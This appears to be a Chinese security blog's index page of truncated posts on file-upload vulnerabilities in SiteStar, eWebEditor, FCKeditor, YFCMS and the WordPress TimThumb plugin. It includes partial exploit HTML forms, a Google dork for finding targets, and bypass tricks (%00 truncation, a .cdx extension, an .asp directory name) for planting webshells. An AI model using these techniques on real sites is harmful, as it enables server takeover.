建站之星 SiteStar V2.0 任意文件上传漏洞

分类:安全 | 2012-03-12 | 撸过 360 次
0人扯谈

发布日期:2011-03.16

发布作者:cnryan

影响版本:SiteStar V2.0 beta

官方网站:http://www.sitestar.cn/

漏洞类型:文件上传

[1]漏洞概述:

SiteStar V2.0没有正确限制文件的上传,远程攻击者可能利用此漏洞上传任意文件到Web目录,最终导致在服务器上执行任意命令。

[2]漏洞分析:

漏洞产生在 /script/multiupload/uploadify.php 文件:

<?php
if (!empty($_FILES)) {
 $tempFile = $_FILES['Filedata']['tmp_na[......]

继续阅读

手动构建htm代码直接传给upload

分类:安全 | 2011-12-30 | 撸过 243 次
0人扯谈

<form action="http://www.badguest.cn /ewebeditor/upload.asp?action=save&type=IMAGE&style=standard1" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
<input type=hidden na[......]

继续阅读

解决Fckeditor删除所有上传页面如何上传

分类:安全 | 2011-12-17 | 撸过 909 次
0人扯谈

 

首先,你得确定下Fckeditor的版本。

 

/FCKeditor/editor/dialog/fck_about.html

 

其次,你确定下以下几个上传页面是否真的被删除了呢?

 

/FCKeditor/editor/filemanager/browser/default/browser.html

/FCKeditor/editor/filemanager/browser/default/connectors/test.html

/FCKeditor/editor/filemanager/upload/test.html

/[......]

继续阅读

突破限制——双文件上传

分类:安全 | 2011-11-14 | 撸过 1,220 次
0人扯谈

下面是一个上传地址:

 
 

右键—查看源代码,修改2处代码:

 
 

修改后:

 
 

保存为1.html

 
 

第一个上传选择正常的jpg图片,第2个选择我们的马,
这里asp过滤了,所以我选择cdx

 
 

成功突破,
右键—查看源代码

 
 

菜刀连接:

upfile_pic.asp/upload_pic.asp及upfile_flash.asp/upload_flash.asp文件上传一句话

分类:安全 | 2011-11-12 | 撸过 326 次
0人扯谈

upfile_other.asp/upload_other.asp等,使用upload_wj.inc模板来进行上传的地方,一把可以通过filepath构造.asp%00这样的截断路径来上传

 

但是不是一定都会成功,主要说下碰到的错误:

 

1.Microsoft VBScript 运行时错误800a01f4 变量未定义: 'upload' 行12

 

这个错误没法解决,对应语句set upload=new upload_file

 

报错的原因是asp脚本指定了要强制先申明变量,就是前面要加var upload语句。而这儿没有这么个语[......]

继续阅读

YFCMS之ewebeditor上传漏洞及修复

分类:安全 | 2011-08-21 | 撸过 401 次
1人扯谈

google关键字:intext:版权所有:yfcms

利用文件:admin\WebEditor\asp\upload.asp

利用代码:
<form action="http://www.badguest.cn/admin/WebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=st999.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=upl[......]

继续阅读

WordPress暴最新严重漏洞

分类:安全 | 2011-08-5 | 撸过 564 次
1人扯谈

不要被标题吓到了,只是个插件的问题,好多CMS或者博客多死在插件的漏洞上面,

所以大家还是少装点插件,能用代码解决应当要用插件。这次的问题比较严重,能

直接上传webshell。插件名称:Wordpress Timthumb一款缩略图功能的插件。

漏洞文件:timthumb.php,该文档定义了数个可以远程提取的相册,但脚本并没有

很好地验证这些域名,因此类似“http://flickr.com.maliciousdomain.com”这样的

欺骗性二三级域名也会被通过,所以黑客理论上可以用任何域名后缀轻松仿冒,

并通过缓存目录上传各种恶意程序。

号外号外,好多黑客大牛的博客[......]

继续阅读